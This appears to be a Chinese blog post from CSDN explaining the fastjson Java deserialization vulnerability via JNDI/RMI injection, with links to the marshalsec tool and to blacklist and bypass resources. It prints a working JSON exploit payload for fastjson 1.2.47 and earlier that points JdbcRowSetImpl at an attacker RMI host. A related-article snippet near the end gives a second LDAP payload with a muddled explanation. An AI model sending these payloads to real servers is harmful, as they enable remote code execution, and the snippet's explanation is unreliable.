fastjson反序列化漏洞原理简述

最新推荐文章于 2024-05-28 16:15:00 发布
最新推荐文章于 2024-05-28 16:15:00 发布
阅读量5.7k 收藏 4
点赞数 1
分类专栏: web java 渗透测试 文章标签: java 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xianyu9w/article/details/123773827
版权
web 同时被 3 个专栏收录
8 篇文章 0 订阅
订阅专栏
java
7 篇文章 1 订阅
订阅专栏
渗透测试
6 篇文章 1 订阅
订阅专栏

作为反序列化三大巨头之一,fastjson出现的频率也是很高的,今天就给大家简单描述一下。

  • fastjson简介
    Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。简单来说就是可以进行类和json格式的字符串互相转换。
  • 漏洞原理
    攻击者在本地启一个rmi的服务器,上面挂上恶意的payload
    让被攻击的目标反序列化特定的类,这个类最终会调用lookup()函数,导致jndi接口指向我们的rmi服务器上的恶意payload

jndi是一个Java命令和目录接口,举个例子,通过jndi进行数据库操作,无需知道它数据库是mysql还是ssql,还是MongoDB等,它会自动识别。当然rmi也可以通过jndi实现,rmi的作用相当于在服务器上创建了类的仓库的api,客户端只用带着参数去请求,服务器进行一系列处理后,把运算后的参数还回来

rmi服务器:https://github.com/mbechler/marshalsec

要注意的是jre版本需要和目标服务器版本相同。
官方给出的修复补丁一直都是升级黑名单

github上有人跑出的版本黑名单:https://github.com/LeadroyaL/fastjson-blacklist
目前更新到1.2.71

对于fastjson<=1.2.47有个通用exp:

{
    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    }, 
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "rmi://x.x.x.x:1098/jndi", 
        "autoCommit": true
    }
}

高版本的java对jndi注入进行了限制,由于环境的不同,存在一些方法进行绕过,这里推荐下国外Michael Stepankin大牛的方法。https://www.veracode.com/blog/research/exploiting-jndi-injections-java

本文参考:https://www.jianshu.com/p/35b84eda9292?utm_campaign=haruki
https://www.cnblogs.com/sijidou/p/13121332.html

一泽re.
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fastjson 1.2.74版本发布,fastjson反序列化漏洞升级
bufegar0的博客
10-14 6689
更新说明 fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化JavaBean。 但在安全方面fastjson总是被曝出存在反序列化安全漏洞,会造成会服务器的攻击,风险极大。 影响版本 fastjson <=1.2.68 fastjson sec版本 <= sec9 android版本不受此漏洞影响 解决办法 升级至最新版本1.2.74 1.2.74更新说明 Issues 修复序列化时B
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
03-02
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
fastjson的这些坑,你误入了没?
一猿小讲
06-25 7108
背景:最近 fastjson 被爆出新的远程代码执行漏洞之后,赶紧督促项目组快马加鞭去修改(吐槽:真改不动,架不住项目既多又老),鉴于项目不同,依赖的 fastjson 版本也不同,本次...
反序列化漏洞原理、成因、危害、攻击、防护、修复方法
最新发布
2302_76672693的博客
05-28 995
反序列化漏洞原理、成因、危害、攻击、防护、修复方法
fastjson又双叒叕出安全漏洞
码瘾的空间
06-03 1345
  近日,阿里云应急响应中心监测到fastjson爆发新的反序列化远程代码执行漏洞,黑客利用漏洞,可绕过autoType限制,直接远程执行任意命令攻击服务器,风险极大。 1. 漏洞描述   fastjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。阿里云应急响应中心提醒fastjson用户尽快采取安全措施阻止
fastjson jar包_Fastjson <=1.2.47 反序列化漏洞
weixin_39644146的博客
11-28 191
0x01 漏洞介绍Fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type"指定反序列化的类型。其次,Fastjson自定义的反序列化机制会调用指定类中的se...
Fastjson反序列化漏洞史1
08-03
然而,Fastjson在过去的几年里曾曝出一系列的反序列化漏洞,这些漏洞可能被攻击者利用,执行任意代码,从而对系统安全构成威胁。 在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的...
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
Java反序列化漏洞自动挖掘方法.pdf
08-21
Java反序列化漏洞是软件安全领域中的一个重要话题,尤其在AI信息安全研究和可信编译安全架构中,它关乎系统的安全性和稳定性。反序列化是将从磁盘或网络中读取的序列化数据转换回内存中的对象的过程。在Java中,这一...
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列化和反序列化Java对象。当我们在处理日期时间字段时,可能会遇到反序列化时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
基于Java实现JSON反序列化器(编译原理)
06-21
在实际应用中,Java提供了许多库来处理JSON,例如Jackson、Gson、Fastjson等,它们已经实现了高效且功能丰富的反序列化器。然而,通过理解编译原理并亲手实现一个简单的JSON反序列化器,我们可以更深入地理解JSON的...
最新版 fastjson-1.2.70.jar
06-01
最新版 fastjson-1.2.70.jar
fastjson-1.1.70.android.jar
08-31
fastjson-1.1.70.android.jar,安卓专用fastjson解析jar包
fastjson-1.2.60.rar
09-17
阿里云应急响应中心监测到fastjson爆出远程拒绝服务漏洞,攻击者在请求中构造特定json字符串,可远程造成服务器内存和CPU等资源耗尽,最终拒绝服务。官方已发布公告说明,最新的1.2.60和带有sec06字符的版本不受影响
fastjson-1.2.70.jar.zip
03-21
FastJsonjar包
Fastjson漏洞
weixin_43873557的博客
02-06 5158
Fastjson概述 Fastjson是阿里巴巴公司开源的一款json解析器,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。 ➢历史漏洞 Fastjson <=1.2.24 反序列化远程命令执行漏洞 Fastjson <=1.2.41 反序列化远程命令执行漏洞 Fastjson <=1.2.42 反序列化远程命令执行漏洞 Fastjson <=1.2.43 反序列化远程命令执行漏洞
fastjson1.2.75暂未修补的反序列化漏洞
d3f4ult的博客
12-30 7397
目录前言旧版本漏洞回顾1.2.68的漏网之鱼“系统的白名单”"通行证""绕过" 前言 这几天在一直研究fastjson反序列化漏洞,从1.2.24版本开始一直到1.2.68版本,其漏洞分析及其利用在网上还是很多的,但不知是大佬们有意为之还是怎样,各博客上写的payload大致差不多,但其实在1.2.68的漏洞中,能用的思路不只有AutoCloseable这一个,还有其他方式也有可能导致RCE,我相信大佬们的手中依然有没有放出的payload。 其实1.2.75漏洞(在我看来确实是漏洞,因为确实执行了反序列化
Fastjson反序列化漏洞
Massimo__JAVA的博客
07-16 874
Fastjson是一款广泛应用于Java开发的JSON解析库,它提供了高效、方便、安全的序列化和反序列化功能。通过对Fastjson漏洞的研究,发现在其默认配置下,Fastjson存在高危漏洞,攻击者可以利用该漏洞执行任意代码,从而实现远程代码执行攻击。
fastjson反序列化漏洞原理
05-20
fastjson反序列化漏洞是指攻击者利用fastjson反序列化功能,将恶意构造的JSON数据传递给目标程序,从而在程序中执行任意代码的漏洞漏洞原理主要是由于fastjson反序列化时,会根据JSON数据中的"type"字段进行类的反射处理,从而实例化对象。攻击者可以通过恶意构造的JSON数据,修改"type"字段的值,使得fastjson反序列化时实例化的对象为攻击者所指定的恶意类,从而在程序中执行任意代码。 例如,攻击者可以通过以下JSON数据进行攻击: ```json { "@type": "com.alibaba.fastjson.JSONObject", "name": "test", "password": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "val": { "dataSourceName": "ldap://localhost:1389/Exploit", "autoCommit": true } } ``` 在上述JSON数据中,攻击者将"@type"字段的值修改为"com.alibaba.fastjson.JSONObject",从而使fastjson反序列化时实例化的对象为JSONObject对象。然后,攻击者将"password"字段的"@type"值修改为"java.lang.Class",并将"val"字段的值设置为恶意的JdbcRowSetImpl类,从而在程序中执行恶意代码。 因此,如果程序使用fastjson库进行反序列化操作时,需要注意对输入数据进行合法性检查,避免被攻击者利用反序列化漏洞攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值